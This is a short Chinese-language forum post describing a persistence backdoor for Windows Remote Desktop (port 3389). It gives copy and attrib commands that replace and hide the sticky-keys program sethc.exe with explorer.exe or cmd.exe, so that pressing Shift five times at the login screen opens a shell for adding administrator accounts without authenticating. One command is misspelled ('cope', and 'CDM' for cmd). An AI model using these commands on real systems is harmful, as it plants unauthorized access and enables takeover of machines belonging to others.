巧妙的3389后门~~~(申精)
除了在本机登陆外,我们可能还想留下一个帐户后门,让我们可以从远程3389终端登录。直接建立账户名是比较危险的方法,我们可以利用Windows系统中的特殊的辅助工具来完成这个任务。
点击“开始”菜单→“运行”,输入命令“CDM”,回车后打开命令提示符窗口。在命令提示符窗口中,执行如下命令:
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
cope c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe+h
attrib c:\windows\system32\dllcache\sethc.exe+h
这几句命令的作用,是将系统中的辅助工具“sethc.exe”,替换为“explorer.exe”,这样就可以在3389或本地登陆界面中打开粘带键开关了。以后在3389远程连接窗口中,连续按下Shift键,即可自动打开资源管理器。点击工具栏“向上”按钮,返回到桌面,右键点击“我的电脑”,在弹出菜单中选择“管理”命令,打开管理器工具,直接添加用户名即可。也可以打开控制面板中的帐户管理,添加管理员帐户。用同样的原理,也可将“sethc.exe”,替换为“cmd.exe”,即可在CMDSHELL中执行帐户添加命令。
提示:在window 2000/xp/vista下,连续按Shift键5次,可以运行“sethc.exe”打开粘带键,而且在登录界面里也可以打开。采用替换“sethc.exe”的文件的方法,就可以实现运行任意程序的目的,其原理类似于将window系统的屏保程序替换成“cmd.exe”,就可以打开shell了
